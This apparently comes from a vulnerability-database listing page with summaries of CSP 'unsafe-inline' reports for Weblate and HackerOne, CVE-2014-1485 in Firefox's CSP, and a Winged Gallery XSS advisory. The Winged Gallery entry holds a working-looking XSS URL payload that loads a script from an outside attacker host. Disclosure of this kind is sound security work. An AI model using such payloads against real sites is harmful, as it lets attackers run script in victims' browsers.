Hacker One
added 2017/05/23 10:55 a.m., 21 views

Weblate: CSP "script-src" includes "unsafe-inline" in weblate.org and demo.weblate.org

Weblate is using unsafe-inline in its script-src CSP header, which allows the use of inline resources such as inline script elements, javascript: URLs, inline event handlers, and inline style elements. PoC: HTTP/1.1 200 OK Server: nginx Date: Tue, 23 May 2017 10:49:15 GMT Content-Type: text/html; charset=utf-8...

2 AI score
Exploits 0
Hacker One
added 2017/05/03 1:58 p.m., 257 views

HackerOne: www.hackerone.com website CSP "script-src" includes "unsafe-inline"

Summary: The HTTP header of the hackerone.com website includes an unsafe CSP parameter for "script-src".
Description: The hackerone.com website https://www.hackerone.com has a Content-Security-Policy configured, as pointed out on the Bug Bounty page of their program: We utilize a strict Content...

6.7 AI score
Exploits 0
NVD
added 2014/02/06 5:44 a.m., 16 views

CVE-2014-1485

The Content Security Policy CSP implementation in Mozilla Firefox before 27.0 and SeaMonkey before 2.24 operates on XSLT stylesheets according to style-src directives instead of script-src directives, which might allow remote attackers to execute arbitrary XSLT code by leveraging insufficient...

7.5 CVSS, 9.6 AI score, 0.00964 EPSS
Exploits 0, References 19
securityvulns
added 2006/06/27 12:00 a.m., 34 views

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...

0.1 AI score
Exploits 0